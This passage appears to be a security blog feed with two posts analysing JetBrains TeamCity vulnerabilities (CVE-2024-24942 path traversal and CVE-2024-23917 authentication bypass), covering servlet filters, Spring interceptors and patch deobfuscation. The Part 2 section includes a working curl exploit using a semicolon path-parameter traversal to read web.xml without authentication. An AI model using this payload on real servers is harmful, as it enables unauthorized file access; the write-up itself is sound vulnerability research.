class="language-plaintext highlighter-rouge">///rest/swaggerui</code> becomes <code class="language-plaintext highlighter-rouge">/rest/swaggerui</code>).</li> <li><code class="language-plaintext highlighter-rouge">removeSessionId()</code>: Strips out any session ID appended to the URI after a semicolon (<code class="language-plaintext highlighter-rouge">;</code>), returning the clean path without it. For example, if the URI is <code class="language-plaintext highlighter-rouge">/rest/swaggerui;JSESSIONID=123456</code>, this method removes <code class="language-plaintext highlighter-rouge">;JSESSIONID=123456</code>, leaving <code class="language-plaintext highlighter-rouge">/rest/swaggerui</code>. This ensures that the session information is excluded from the path.</li> </ul> <p>As we have already seen in the <a href="/2024/05/27/jetbrains-teamcity-auth-bypass/">Part-1</a> of this series that in Tomcat, the semicolon (;) is used for path parameter passing, a mechanism where additional data can be embedded in the URL without affecting the main path. For example, in a URL like <code class="language-plaintext highlighter-rouge">/app/rest/resource;param=value</code>, the part after the semicolon (<code class="language-plaintext highlighter-rouge">param=value</code>) is treated as a parameter for that specific route (<code class="language-plaintext highlighter-rouge">/resource</code>), without altering the route itself.</p> <p><strong><u>Note</u></strong>: The parameters passed will be ignored by AntPathMatcher for matching purposes.</p> <p>Basically, the application custom implemented the <code class="language-plaintext highlighter-rouge">getPathWithoutContext()</code> to remove anything after a semicolon (<code class="language-plaintext highlighter-rouge">;</code>) to prevent passing path parameters. However, due to the flawed implementation, when a traversal payload is included, everything after the semicolon gets stripped. As a result, the <code class="language-plaintext highlighter-rouge">site.com/app/rest/swaggerui;alpha/../../file.txt</code> path bypasses the authentication check, the route will hit /app/rest/swaggerui and the traversal payload is mistakenly treated as a parameter to this route.</p> <p>Note: Using <code class="language-plaintext highlighter-rouge">getPathInfo()</code> is different from <code class="language-plaintext highlighter-rouge">getRequestURI()</code> because it returns only the part of the request path after the servlet’s mapped path, excluding the context path and any path parameters whereas <code class="language-plaintext highlighter-rouge">getRequestURI()</code> retrieves the entire URI of the request, including the context path, servlet path, and any additional path segments or parameters. This highlights how different methods of interpreting paths can lead to vulnerabilities, especially when handling elements like path parameters (<code class="language-plaintext highlighter-rouge">;param=value</code>) or traversal sequences (<code class="language-plaintext highlighter-rouge">../</code>).</p> <h2 id="exploit">Exploit</h2> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">curl <span class="nt">-i</span> <span class="nt">-s</span> <span class="nt">-k</span> <span class="nt">-X</span> GET <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Host: localhost:8111'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'Accept: application/json'</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s1">'X-TC-CSRF-Token: 2e545bf5-xxxxxxxxxxxxxxxxxxx8'</span> <span class="se">\</span> <span class="s1">'http://localhost:8111/app/rest/swaggerui;asdf/../../web.xml'</span></code></pre></figure> <p>The crafted request is sent to <code class="language-plaintext highlighter-rouge">http://localhost:8111/app/rest/swaggerui;asdf/../../web.xml</code> , where <code class="language-plaintext highlighter-rouge">;asdf</code> acts as a path parameter to manipulate how the server interprets the request. First, the <code class="language-plaintext highlighter-rouge">AuthorizationInterceptorImpl</code> sanitizes the request by stripping the path parameter (<code class="language-plaintext highlighter-rouge">;asdf</code>), effectively processing it as <code class="language-plaintext highlighter-rouge">http://localhost:8111/app/rest/swaggerui</code>. Since this endpoint is configured as unauthenticated, the request bypasses authentication. When the path reaches AntPathMatcher, it is checked against the pattern <code class="language-plaintext highlighter-rouge">/app/rest/swagger**</code>, which matches path <code class="language-plaintext highlighter-rouge">/app/rest/swaggerui</code>. The remaining portion is interpreted as a path parameter for the route. This enables traversal beyond the intended directory, providing unauthorized access to files like <code class="language-plaintext highlighter-rouge">web.xml</code>.</p> <h2 id="references">References:</h2> <ol> <li><a href="https://blog.sndav.org/archives/teamcity-authentication-bypass-rce-cve-2024-23917#CVE-2024-24942" target="_blank">sndav.org</a></li> </ol> Wed, 11 Dec 2024 00:00:00 -0800 https://blog.0daylabs.com/2024/12/11/jetbrains-teamcity-authbypass-path-traversal/ https://blog.0daylabs.com/2024/12/11/jetbrains-teamcity-authbypass-path-traversal/ java aa Diving deep into Jetbrains TeamCity Part 1 - Analysing CVE-2024-23917 leading to Authentication Bypass <h2 id="introduction">Introduction</h2> <p>JetBrains TeamCity is a continuous integration (CI) and continuous delivery (CD) tool developed by JetBrains. It is designed to automate the building, testing, and deployment processes in software development.</p> <p><strong><u>NOTE</u></strong>: This article is only intended for educational purposes understanding how vulnerabilities occur in real world.</p> <h2 id="installing-teamcity">Installing TeamCity</h2> <p>Download the <a href="https://download.jetbrains.com/teamcity/TeamCity-2023.11.2.tar.gz" target="_blank">2023.11.2</a> release from the official <a href="https://www.jetbrains.com/teamcity/download/other.html" target="_blank">Jetbrains TeamCity</a> website and extract it. For the purpose of this article, I will be using the Intellij IDEA Community Edition to navigate through the codebase.</p> <h2 id="decompiling-the-jars">Decompiling the Jars</h2> <p>Exploring through the teamcity directories, we can see a lot of compiled Jars. In order to access the code, we can decompile these jars using one of the common decompilers. Since we are using Intellij IDEA, we can use the inbuilt decompiler to decompile the jars.</p> <p>One of the problems here is that there are way too many jar files which needs to be decompiled. In order make the process easy, we have written a quick bash script which uses the default IntelliJ decompiler to extract all jar files into a central folder called <code class="language-plaintext highlighter-rouge">fern</code>.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="c">#!/bin/bash</span> <span class="c">#</span> <span class="c"># Extract source code from jar files</span> <span class="c"># Can leverage fern from intelij or jadx</span> <span class="c"># Usage:</span> <span class="c"># ./sourcerer.sh &lt;DIR1&gt; &lt;DIR2&gt; &lt;DIR3&gt; ...</span> <span class="nv">DECOMPILER</span><span class="o">=</span><span class="s2">"fern"</span> <span class="nv">PROCESSES</span><span class="o">=</span>10 <span class="c"># 0 for unlimited</span> <span class="nv">FERN_JAR</span><span class="o">=</span><span class="s2">"/Applications/IntelliJ IDEA CE.app/Contents/plugins/java-decompiler/lib/java-decompiler.jar"</span> <span class="k">for </span><span class="nb">dir </span><span class="k">in</span> <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span><span class="p">;</span> <span class="k">do </span><span class="nv">workdir</span><span class="o">=</span><span class="s2">"</span><span class="nv">$dir</span><span class="s2">/</span><span class="nv">$DECOMPILER</span><span class="s2">"</span> <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">"Processing </span><span class="nv">$dir</span><span class="s2">"</span> <span class="k">case</span> <span class="nv">$DECOMPILER</span> <span class="k">in</span> <span class="s2">"fern"</span><span class="p">)</span> <span class="nb">mkdir</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">/fern-jars"</span> find <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="nt">-type</span> f <span class="nt">-print0</span> <span class="nt">-name</span> <span class="s2">"*.jar"</span> | xargs <span class="nt">-0</span> <span class="nt">-I</span> <span class="o">{}</span> <span class="nt">-P</span> <span class="s2">"</span><span class="nv">$PROCESSES</span><span class="s2">"</span> java <span class="nt">-jar</span> <span class="s2">"</span><span class="nv">$FERN_JAR</span><span class="s2">"</span> <span class="o">{}</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">/fern-jars"</span> find <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">/fern-jars"</span> <span class="nt">-name</span> <span class="s2">"*.jar"</span> <span class="nt">-exec</span> unzip <span class="nt">-o</span> <span class="o">{}</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">"</span> <span class="se">\;</span> <span class="nb">rm</span> <span class="nt">-rf</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">/fern-jars"</span> <span class="p">;;</span> <span class="s2">"jadx"</span><span class="p">)</span> find <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="nt">-type</span> f <span class="nt">-print0</span> <span class="nt">-name</span> <span class="s2">"*.jar"</span> | xargs <span class="nt">-0</span> <span class="nt">-I</span> <span class="o">{}</span> <span class="nt">-P</span> <span class="s2">"</span><span class="nv">$PROCESSES</span><span class="s2">"</span> jadx <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$workdir</span><span class="s2">"</span> <span class="o">{}</span> <span class="nt">--comments-level</span> none <span class="p">;;</span> <span class="k">esac</span> <span class="k">done</span></code></pre></figure> <p>Save the file as <code class="language-plaintext highlighter-rouge">sourcerer.sh</code> and run the script providing the extracted teamcity directory as the input. The script will repeatedly start extracting all jars inside.</p> <p><strong><u>NOTE</u></strong>: The script will take sometime complete since there are way too many jars. You can modify the <code class="language-plaintext highlighter-rouge">PROCESSES</code> variable to make the script faster.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">a0xnirudh@X1 ~/teamcity <span class="nv">$ </span><span class="nb">chmod</span> +x sourcerer.sh a0xnirudh@X1 ~/teamcity <span class="nv">$ </span>./sourcerer.sh TeamCity</code></pre></figure> <p>Once the extraction is complete, a new directory named <code class="language-plaintext highlighter-rouge">fern</code> will be available inside the TeamCity project folder. From intellij, <strong>right click on this folder &gt; Mark Directory as &gt; Sources Root</strong>. This step is important without which we won’t be able to do dynamic analysis or search for classes etc…</p> <h2 id="architecture">Architecture</h2> <p>Exploring through the directory structure, especially within the <code class="language-plaintext highlighter-rouge">webapps/ROOT</code> directory, we can see the <code class="language-plaintext highlighter-rouge">web.xml</code> file inside the <code class="language-plaintext highlighter-rouge">WEB-INF</code> directory. This file contains the Servlets, mappings and filters.</p> <h3 id="servlet-filters">Servlet Filters</h3> <p>In general, Servlet mappings are used to define API endpoints to corresponding controllers. Let’s understand how the file and its mapping works:</p> <p><strong>File</strong>: <em>teamcity/TeamCity/webapps/ROOT/WEB-INF/web.xml</em></p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">17: <span class="nt">&lt;servlet&gt;</span> 18: <span class="nt">&lt;description&gt;</span>Support maintenance screens when TeamCity server is starting up.<span class="nt">&lt;/description&gt;</span> 19: <span class="nt">&lt;servlet-name&gt;</span>MaintenanceServlet<span class="nt">&lt;/servlet-name&gt;</span> 20: <span class="nt">&lt;servlet-class&gt;</span>jetbrains.buildServer.maintenance.StartupServlet<span class="nt">&lt;/servlet-class&gt;</span> 21: <span class="nt">&lt;/servlet&gt;</span></code></pre></figure> <p>The file starts creating servlets with a name, in the above example <code class="language-plaintext highlighter-rouge">MaintenanceServlet</code> which is defined in the class <code class="language-plaintext highlighter-rouge">jetbrains.buildServer.maintenance.StartupServlet</code>. Let’s look into it’s servlet-mapping:</p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">126: <span class="nt">&lt;servlet-mapping&gt;</span> 127: <span class="nt">&lt;servlet-name&gt;</span>MaintenanceServlet<span class="nt">&lt;/servlet-name&gt;</span> 128: <span class="nt">&lt;url-pattern&gt;</span>/mnt/*<span class="nt">&lt;/url-pattern&gt;</span> 129: <span class="nt">&lt;/servlet-mapping&gt;</span></code></pre></figure> <p>Servlet mapping specifies the servlet name and the URL pattern. This means, if a request comes to the defined URL pattern, in this case, <code class="language-plaintext highlighter-rouge">/mnt/*</code>, then the <code class="language-plaintext highlighter-rouge">MaintenanceServlet</code> servlet will be invoked which further leading to the invocation of the controller <code class="language-plaintext highlighter-rouge">jetbrains.buildServer.maintenance.StartupServlet</code> class.</p> <p>Similarly we have filters defined in the <code class="language-plaintext highlighter-rouge">web.xml</code>, which can be considered as middlewares that get to run before the requests gets into servlet class or the controllers. Let’s take an example to understand:</p> <p><strong>File</strong>: <em>teamcity/TeamCity/webapps/ROOT/WEB-INF/web.xml</em></p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">70: <span class="nt">&lt;filter&gt;</span> 71: <span class="nt">&lt;filter-name&gt;</span>disableBrowserCacheFilter<span class="nt">&lt;/filter-name&gt;</span> 72: <span class="nt">&lt;filter-class&gt;</span>jetbrains.buildServer.web.DisableBrowserCacheFilter<span class="nt">&lt;/filter-class&gt;</span> 73: <span class="nt">&lt;async-supported&gt;</span>true<span class="nt">&lt;/async-supported&gt;</span> 74: <span class="nt">&lt;/filter&gt;</span></code></pre></figure> <p>A filter named <code class="language-plaintext highlighter-rouge">disableBrowserCacheFilter</code> is defined which is handled by the class <code class="language-plaintext highlighter-rouge">jetbrains.buildServer.web.DisableBrowserCacheFilter</code>. Now let’s look at its filter-mapping:</p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">308: <span class="nt">&lt;filter-mapping&gt;</span> 309: <span class="nt">&lt;filter-name&gt;</span>disableBrowserCacheFilter<span class="nt">&lt;/filter-name&gt;</span> 310: <span class="nt">&lt;url-pattern&gt;</span>/update/*<span class="nt">&lt;/url-pattern&gt;</span> 311: <span class="nt">&lt;/filter-mapping&gt;</span></code></pre></figure> <p>Filter mappings specify which filters to be run for a given url pattern. Here, for any URL matching <code class="language-plaintext highlighter-rouge">/update/*</code>, the <code class="language-plaintext highlighter-rouge">disableBrowserCacheFilter</code> filter will be run which is defined in the class <code class="language-plaintext highlighter-rouge">jetbrains.buildServer.web.DisableSessionIdFromUrlFilter</code>.</p> <p>Now if we look at the servlet mapping for <code class="language-plaintext highlighter-rouge">/update/*</code>, it points to <code class="language-plaintext highlighter-rouge">buildServer</code> servlet.</p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">156: <span class="nt">&lt;servlet-mapping&gt;</span> 157: <span class="nt">&lt;servlet-name&gt;</span>buildServer<span class="nt">&lt;/servlet-name&gt;</span> 158: <span class="nt">&lt;url-pattern&gt;</span>/update/*<span class="nt">&lt;/url-pattern&gt;</span> 159: <span class="nt">&lt;/servlet-mapping&gt;</span></code></pre></figure> <p>So in-short, if any request comes to <code class="language-plaintext highlighter-rouge">/update/*</code> endpoint, the filter will be triggered first and then the request is forwarded to Servlet (or controller class).</p> <p>Similarly another thing we can see is error mapping:</p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">48: <span class="nt">&lt;error-page&gt;</span> 49: <span class="nt">&lt;error-code&gt;</span>401<span class="nt">&lt;/error-code&gt;</span> 50: <span class="nt">&lt;location&gt;</span>/unauthorized.html<span class="nt">&lt;/location&gt;</span> 51: <span class="nt">&lt;/error-page&gt;</span></code></pre></figure> <p>So for a given request, if the controller returns the response code 401, then the <code class="language-plaintext highlighter-rouge">/unauthorized.html</code> is rendered.</p> <h3 id="spring-interceptors">Spring Interceptors</h3> <p>Now filters is a functionality provided by native Java Servlets but what if, we want to achieve the same functionality but need more context before taking a decision? For example, we wanna setup a filter which checks for authentication but since the authentication part is handled by SprintBoot, the servlet filters won’t have context since it operates on a lower level as the following diagram depicts:</p> <div align="center"><img src="/images/2024/teamcity/filters_interceptors.png" alt="Filters and Interceptors in springboot" height="450" /></div> <p>In order to achieve a similar functionality, Springboot has a concept of Interceptors which is a part of core Spring MVC framework which allows us to intercept and process HTTP requests and responses before they are handled by the controller or sent back to the client. It’s typically used for request transformations, logging (debug or performance logs) or security (AuthN or AuthZ).</p> <p>Filters are similar to interceptors in functionality (can be used to interept requests and response) but it operates at the Servlet API level (and not specific to Spring framework since spring framework itself is built on top of Servlet API). This means that filters are executed before the request even reaches the Springboot. So, in general, we can use a combination of both (like what TeamCity does) but interceptors are commonly used when we need access to Spring application context. Example, while logging, caching can be done at Filter level, AuthN/AuthZ is generally done at Interceptor level (since it needs Spring context)</p> <p>So how does all these work together ? The following diagram represents the flow (<a href="https://blog.kakaocdn.net/dn/bmoLez/btrv5mrG2OD/c5k6qMlA94FMvVnM2qMLY1/img.png">image source</a>):</p> <div align="center"><img src="/images/2024/teamcity/springboot_handler_interceptor.png" alt="Tomcat Springboot Interceptor architecture" height="450" /></div> <ol> <li> <p>An incoming HTTP request is first recieved by the webserver (in this case tomcat) which then passes the request onto to Java Servlets.</p> </li> <li> <p>Based on the route mapping, the servlet filters are run and then the request is forwarded to Springboot. The <code class="language-plaintext highlighter-rouge">Dispatcher Servlet</code> is the default entry point for all the incoming requests into springboot.</p> </li> <li> <p>Once the <code class="language-plaintext highlighter-rouge">Dispatcher Servlet</code> recieves the requests, it consults with the URL <code class="language-plaintext highlighter-rouge">HandlerMapping</code> which determines which controller does the request should be passed onto.</p> </li> <li> <p>But before being processed by the controllers, the requests are passed through Spring Interceptors. A given request can be processed by a different number of Interceptors before it reaches to controllers.</p> </li> </ol> <p>Interceptors are classes that implement the <code class="language-plaintext highlighter-rouge">handlerInterceptor</code> interface which has 3 methods:</p> <p><code class="language-plaintext highlighter-rouge">preHandle()</code>: Returns a boolean value indicating whether the request should continue to the next interceptor/controller or not (ex: if AuthZ fails, return false and request won’t reach controller)</p> <p><code class="language-plaintext highlighter-rouge">postHandle()</code>: Executed after the controller method is called but before sending the response to the client (modifying response header?).</p> <p><code class="language-plaintext highlighter-rouge">afterCompletion()</code>: Executed after the response is sent to the client (any cleanup tasks).</p> <p>There could be more than 1 interceptor which will be triggered for a given API endpoint, in which case, the flow works as per the diagram below (<a href="https://media.licdn.com/dms/image/C4E12AQF1EMvT8wpJTg/article-inline_image-shrink_1500_2232/0/1614448550926?e=1718841600&amp;v=beta&amp;t=SHFv3pd9uPcwdb5yG6BoQWKmKvMCa6i0r6E6v8SMP2I">image source</a>):</p> <div align="center"><img src="/images/2024/teamcity/spring_interceptors.png" alt="Springboot Interceptor architecture" height="450" /></div> <p>Now that the fundamentals for exploring the vulnerabilities are clear, let’s explore the security patch which got released.</p> <h2 id="understanding-the-patch-cve-2024-23917">Understanding the Patch (CVE-2024-23917)</h2> <p>From the <a href="https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/">official advisory</a>, one of the ways to fix the vulnerability is to apply a <a href="https://download.jetbrains.com/teamcity/plugins/internal/fix_CVE_2024_23917.zip">security patch</a>. Let’s download the patch and try to understand it better.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">a0xnirudh@X1 ~/teamcity/cve-2024-23917 <span class="nv">$ </span>wget <span class="nt">-c</span> https://download.jetbrains.com/teamcity/plugins/internal/fix_CVE_2024_23917.zip a0xnirudh@X1 ~/teamcity/cve-2024-23917 <span class="nv">$ </span>unzip fix_CVE_2024_23917.zip Archive: fix_CVE_2024_23917.zip creating: server/ inflating: server/patch-common-1.0-SNAPSHOT.jar inflating: server/security-patch-plugin-1.0-SNAPSHOT.jar inflating: teamcity-plugin.xml</code></pre></figure> <p>Decompiling and trying to read the source code of the jar, we can see that the patch is heavily obfuscated. Let’s try to <a href="https://github.com/java-deobfuscator/deobfuscator">deobfuscate</a> the patch and then decompile (<a href="https://github.com/leibnitz27/cfr">using cfr</a>) it again to see if the code is more readable:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span><span class="nb">cat </span>config1.yml input: patch-common-1.0-SNAPSHOT.jar detect: <span class="nb">true </span>a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>java <span class="nt">-jar</span> deobfuscator.jar <span class="nt">--config</span> config1.yml <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading classpath <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading input <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Detecting known obfuscators <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - RuleSuspiciousClinit: Zelix Klassmaster typically embeds decryption code <span class="k">in</span> &lt;clinit&gt;. This sample may have been obfuscated with Zelix Klassmaster <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Found suspicious &lt;clinit&gt; <span class="k">in </span>0/0/0/0 <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Recommend transformers: <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - <span class="o">(</span>Choose one transformer. If there are multiple, it<span class="s1">'s recommended to try the transformer listed first) [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - None [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - RuleSimpleStringEncryption: Zelix Klassmaster has several modes of string encryption. This mode replaces string literals with a static string or string array, which are decrypted in &lt;clinit&gt; Note that this mode does not generate a method with signature (II)Ljava/lang/String; [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Found suspicious &lt;clinit&gt; in 0/0/0/0 [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Recommend transformers: [main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - (Choose one transformer. If there are multiple, it'</span>s recommended to try the transformer listed first<span class="o">)</span> <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - com.javadeobfuscator.deobfuscator.transformers.zelix.string.SimpleStringEncryptionTransformer <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - All detectors have been run. If you <span class="k">do </span>not see anything listed, check <span class="k">if </span>your file only contains name obfuscation. <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Do note that some obfuscators <span class="k">do </span>not have detectors.</code></pre></figure> <p>Using the deobfuscator detection technique, it recommends us to use <code class="language-plaintext highlighter-rouge">com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer</code>. Let’s deobfuscate the jars and try to decompile it using <a href="https://github.com/leibnitz27/cfr">cfr</a> decompiler.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span><span class="nb">cat </span>config1.yml input: patch-common-1.0-SNAPSHOT.jar output: patch_common_deobfuscated.jar transformers: - com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span><span class="nb">cat </span>config2.yml input: security-patch-plugin-1.0-SNAPSHOT.jar output: security_patch_deobfuscated.jar transformers: - com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>java <span class="nt">-jar</span> deobfuscator.jar <span class="nt">--config</span> config1.yml <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading classpath <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading input <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Computing callers <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Transforming <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Running com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Starting <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Decrypted strings from 2 encrypted classes <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Decrypted 51 strings <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Done <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Writing a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>java <span class="nt">-jar</span> deobfuscator.jar <span class="nt">--config</span> config2.yml <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading classpath <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Loading input <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Computing callers <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Transforming <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Running com.javadeobfuscator.deobfuscator.transformers.zelix.StringEncryptionTransformer <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Starting <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Decrypted strings from 1 encrypted classes <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Decrypted 3 strings <span class="o">[</span>Zelix] <span class="o">[</span>StringEncryptionTransformer] Done <span class="o">[</span>main] INFO com.javadeobfuscator.deobfuscator.Deobfuscator - Writing a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>java <span class="nt">-jar</span> cfr-0.152.jar patch_common_deobfuscated.jar <span class="nt">--renameillegalidents</span> <span class="nb">true</span> <span class="nt">--outputdir</span> patch_common_extract Processing patch_common_deobfuscated.jar <span class="o">(</span>use silent to silence<span class="o">)</span> Processing 0.0.0.0 Processing 0.0.0.2 a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>java <span class="nt">-jar</span> cfr-0.152.jar security_patch_deobfuscated.jar <span class="nt">--renameillegalidents</span> <span class="nb">true</span> <span class="nt">--outputdir</span> security_patch_extract Processing security_patch_deobfuscated.jar <span class="o">(</span>use silent to silence<span class="o">)</span> Processing 0.0.0.1 a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>tree patch_common_extract patch_common_extract ├── 0 │   └── 0 │   └── 0 │   ├── 0.java │   └── 2.java └── summary.txt 4 directories, 3 files a0xnirudh@X1 ~/teamcity/cve-2024-23917/server <span class="nv">$ </span>tree security_patch_extract security_patch_extract ├── 0 │   └── 0 │   └── 0 │   └── 1.java └── summary.txt 4 directories, 2 files</code></pre></figure> <p>So we finally have 3 files. Let’s look at the <code class="language-plaintext highlighter-rouge">1.java</code> which we extracted from the original <code class="language-plaintext highlighter-rouge">security-patch-plugin-1.0-SNAPSHOT.jar</code> file:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="cm">/* * Decompiled with CFR 0.152. * * Could not load the following classes: * 0.0.0.0 * jetbrains.buildServer.ServiceLocator * jetbrains.buildServer.log.Loggers * jetbrains.buildServer.serverSide.BuildServerListener * jetbrains.buildServer.serverSide.TeamCityProperties * jetbrains.buildServer.util.EventDispatcher * jetbrains.buildServer.version.ServerVersionHolder * jetbrains.buildServer.web.openapi.PluginDescriptor * org.jetbrains.annotations.NotNull */</span> <span class="kn">package</span> <span class="nn">0.0.0</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">0.0.0._0</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.ServiceLocator</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.log.Loggers</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.serverSide.BuildServerListener</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.serverSide.TeamCityProperties</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.util.EventDispatcher</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.version.ServerVersionHolder</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.web.openapi.PluginDescriptor</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">org.jetbrains.annotations.NotNull</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">_1</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">int</span> <span class="n">cfr_renamed_0</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="n">cfr_renamed_1</span><span class="o">;</span> <span class="kd">public</span> <span class="nf">_1</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">ServiceLocator</span> <span class="n">serviceLocator</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">PluginDescriptor</span> <span class="n">pluginDescriptor</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">EventDispatcher</span><span class="o">&lt;</span><span class="nc">BuildServerListener</span><span class="o">&gt;</span> <span class="n">eventDispatcher</span><span class="o">)</span> <span class="o">{</span> <span class="kt">boolean</span> <span class="n">bl</span> <span class="o">=</span> <span class="n">cfr_renamed_1</span><span class="o">;</span> <span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="nc">Integer</span><span class="o">.</span><span class="na">parseInt</span><span class="o">(</span><span class="nc">ServerVersionHolder</span><span class="o">.</span><span class="na">getVersion</span><span class="o">().</span><span class="na">getBuildNumber</span><span class="o">());</span> <span class="kt">int</span> <span class="n">n2</span> <span class="o">=</span> <span class="nc">TeamCityProperties</span><span class="o">.</span><span class="na">getInteger</span><span class="o">((</span><span class="nc">String</span><span class="o">)</span><span class="s">"teamcity.CVE-2024-23917.patch.maxAffectedBuildNumber"</span><span class="o">,</span> <span class="o">(</span><span class="kt">int</span><span class="o">)</span><span class="mi">147486</span><span class="o">);</span> <span class="k">if</span> <span class="o">(!</span><span class="n">bl</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">n</span> <span class="o">&gt;</span> <span class="n">n2</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"The plugin "</span> <span class="o">+</span> <span class="n">pluginDescriptor</span><span class="o">.</span><span class="na">getPluginName</span><span class="o">()</span> <span class="o">+</span> <span class="s">" is no longer required for this TeamCity version"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="k">new</span> <span class="nf">_0</span><span 